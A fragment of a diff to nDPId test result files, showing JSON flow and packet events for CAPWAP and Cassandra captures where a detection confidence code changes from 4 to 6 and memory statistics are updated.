00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005766,"flow_last_seen":1422329005766,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1422329005766,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1422329005766,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1422329005766,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFwACXAARAAP8Rr9\/AqAoK\/\/\/\/\/zBcFH4AgwAAACACEAAAAAAGWAogaQ4g6AAAAAEAAGYAABQAAQAAJwAoAgIAAQBAlgAAAAAEAQAAAABAlgAAAQAEBwVmAABAlgAAAgAEDAQZAAApAAEEACwAAQEAJQAKAECWAADPAQAAAQAlABYAQJYAAAVBUGI4MzguNjFmMy4wNWFj"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005766,"flow_last_seen":1422329005766,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1422329005766,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005766,"flow_last_seen":1422329005766,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1422329005766,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1422329005766,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1422329005766,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFwACXAARAAP8Rr9\/AqAoK\/\/\/\/\/zBcFH4AgwAAACACEAAAAAAGWAogaQ4g6AAAAAEAAGYAABQAAQAAJwAoAgIAAQBAlgAAAAAEAQAAAABAlgAAAQAEBwVmAABAlgAAAgAEDAQZAAApAAEEACwAAQEAJQAKAECWAADPAQAAAQAlABYAQJYAAAVBUGI4MzguNjFmMy4wNWFj"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005767,"flow_last_seen":1422329005767,"flow_idle_time":200000,"flow_min_l4_payload_len":114,"flow_max_l4_payload_len":114,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1422329005767,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00586{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1422329005767,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1422329005767,"pkt":"uDhh8wWsJOmzR64gCABFwACOANoAAH8RpGHAqAoJwKgKChR+MFwAegAAABACAAAAAAAAAAACAABlAAABACQAAAPoAAAABQIBAAMAQJYAAAEABAcFZgAAQJYAAAAABAEAAAEABAAJQ2lzY28yNTA0BBgABQAAAAAAAAoABsCoCgkAAAAlAAcAQJYAANAAACUACwBAlgAAl1THBF8A"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005767,"flow_last_seen":1422329005767,"flow_idle_time":200000,"flow_min_l4_payload_len":114,"flow_max_l4_payload_len":114,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1422329005767,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005767,"flow_last_seen":1422329005767,"flow_idle_time":200000,"flow_min_l4_payload_len":114,"flow_max_l4_payload_len":114,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1422329005767,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 00586{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1422329005767,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1422329005767,"pkt":"uDhh8wWsJOmzR64gCABFwACOANsAAH8RpGDAqAoJwKgKChR+MFwAegAAABACAAAAAAAAAAACAABlAAABACQAAAPoAAAABQIBAAMAQJYAAAEABAcFZgAAQJYAAAAABAEAAAEABAAJQ2lzY28yNTA0BBgABQAAAAAAAAoABsCoCgkAAAAlAAcAQJYAANAAACUACwBAlgAAl1THBF8A"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1422329015765,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1422329015765,"pkt":"JOmzR64guDhh8wWsCABFwABlAAVAAP8R5V7AqAoKwKgKCTBcFH4AURfgAQAAABb+\/wAAAAAAAAAAADgBAAAsAAAAAAAAACz+\/1Z4mrz13vIlLHFGU8KNmBPwkXkcj0vpbAEOfTafYoZSAAAABAAvADMBAA=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329017533,"flow_last_seen":1422329017533,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1422329017533,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1422329017533,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1422329017533,"pkt":"JOmzR64guDhh8wWsCABFwABsAAFAAEARpFzAqAoKwKgKCTBcFH8AWAAAACADIAAAAAABBAAAAAAAAABAAABYCiBpDiAAAAAAAABYCiBpDiAAAN0JAECWJQEFKDMU3RsAQJYlAAEcq6fyE50AAEcACwAFJ\/9UIA8C1d0="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329017533,"flow_last_seen":1422329017533,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1422329017533,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329017533,"flow_last_seen":1422329017533,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1422329017533,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1422329018033,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1422329018033,"pkt":"JOmzR64guDhh8wWsCABFwADDAAJAAEARpATAqAoKwKgKCTBcFH8ArwAAACADIAAAAAABBAAAAAAAAABAAABYCiBpDiAAAAAAAABYCiBpDiAAAN0JAECWJQEFL9Qy3RsAQJYlAAEcq6fyE50AAEkACwAFKFJLQAQC3ePdGwBAliUAARyrp\/ITnQAAHQALAAUtdhsgDQK\/xN0bAECWJQABHKun8hOdAAAOAAsABS9iq+AIAt7o3RsAQJYlAAEcq6fyE50AAAwACwAFL7WkAA0C3+g="} 00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1422329018533,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"thread_ts_msec":1422329018533,"pkt":"JOmzR64guDhh8wWsCABFwAEaAANAAEARo6zAqAoKwKgKCTBcFH8BBgAAACADIAAAAAABBAAAAAAAAABAAABYCiBpDiAAAAAAAABYCiBpDiAAAN0JAECWJQEFN3Va3RsAQJYlAAEcq6fyE50AACMACwAFMGt3IAoC5+ndGwBAliUAARyrp\/ITnQAAEwALAAUwdLNADQLo6d0bAECWJQABZICZPC30AAADAAsABTJ3KPD9AqWm3RsAQJYlAAH4Ht\/dIQ8AAB8ACwAFNejwUJoCvcLdGwBAliUAAfge390hDwAAEgALAAU2FOxglQK9wt0bAECWJQAB+B7f3SEPAAAcAAsABTZHxnCRAr\/A3RsAQJYlAAH4Ht\/dIQ8AAAcACwAFN246sJsCvr4="} 00183{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":192,"source":"capwap.pcap","alias":"nDPId-test","layer_type":375,"global_ts_msec":1422329034072} @@ -40,11 +40,11 @@ 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1422329136181,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1422329136181,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFwACXAGlAAP8Rr3rAqAoK\/\/\/\/\/zBcFH4AgwAAACACEAAAAAAGWAogaQ4g\/wAAABMAAGYAABQAAQEAJwAoAgIAAQBAlgAAAAAEAQAAAABAlgAAAQAEBwVmAABAlgAAAgAEDAQZAAApAAEEACwAAQEAJQAKAECWAADPAQAAAQAlABYAQJYAAAVBUGI4MzguNjFmMy4wNWFj"} 00183{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":378,"source":"capwap.pcap","alias":"nDPId-test","layer_type":375,"global_ts_msec":1422329141909} 00790{"packet_event_id":1,"packet_event_name":"packet","packet_id":378,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":389,"pkt_type":375,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":389,"pkt_l4_len":0,"thread_ts_msec":1422329141029,"pkt":"AQAMzMzMuDhh8wWsAXeqqgMAAAwgAAK0KHQAAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAQAAY8KAAZABCkjQABAAA8KAAAMsg="} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":379,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":200000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1422329141029,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":379,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":200000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1422329141029,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":394,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1422328963915,"flow_last_seen":1422328966914,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1422329152529,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1422329005766,"flow_last_seen":1422329136181,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":492,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":217,"flow_first_seen":1422329005767,"flow_last_seen":1422329174862,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":1457,"flow_tot_l4_payload_len":54560,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":173,"flow_first_seen":1422329017533,"flow_last_seen":1422329175528,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":26636,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1422329005766,"flow_last_seen":1422329136181,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":492,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":217,"flow_first_seen":1422329005767,"flow_last_seen":1422329174862,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":1457,"flow_tot_l4_payload_len":54560,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":173,"flow_first_seen":1422329017533,"flow_last_seen":1422329175528,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":26636,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","packets-captured":422,"packets-processed":397,"total-skipped-flows":0,"total-l4-payload-len":81835,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":48,"global_ts_msec":1422329175528} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 422/397 @@ -54,9 +54,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5885140 bytes -~~ total memory freed........: 5885140 bytes -~~ total allocations/frees...: 118525/118525 +~~ total memory allocated....: 6018774 bytes +~~ total memory freed........: 6018774 bytes +~~ total allocations/frees...: 121287/121287 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 186 chars ~~ json string max len.......: 806 chars diff --git a/test/results/cassandra.pcap.out b/test/results/cassandra.pcap.out index e2de6fc78..e7cfc4209 100644 --- a/test/results/cassandra.pcap.out +++ b/test/results/cassandra.pcap.out @@ -4,14 +4,14 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1450889498032,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA86nRAAEAGUkV\/AAABfwAAAbXII1K9tHk3AAAAAKACqqr+MAAAAgT\/1wQCCAon7JNDAAAAAAEDAwc="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1450889498032,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStcjswQ7evbR5OKASqqr+MAAAAgT\/1wQCCAon7JNDJ+yTQwEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1450889498032,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA06nVAAEAGUkx\/AAABfwAAAbXII1K9tHk47MEO34AQAVb+KAAAAQEICifsk0Mn7JND"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1450889498074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA81IRAAEAGaDV\/AAABfwAAAbXJI1KmXkfoAAAAAKACqqr+MAAAAgT\/1wQCCAon7JNsAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1450889498074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStckXl5aGpl5H6aASqqr+MAAAAgT\/1wQCCAon7JNsJ+yTbAEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1450889498074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA01IVAAEAGaDx\/AAABfwAAAbXJI1KmXkfpF5eWh4AQAVb+KAAAAQEICifsk2wn7JNs"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} 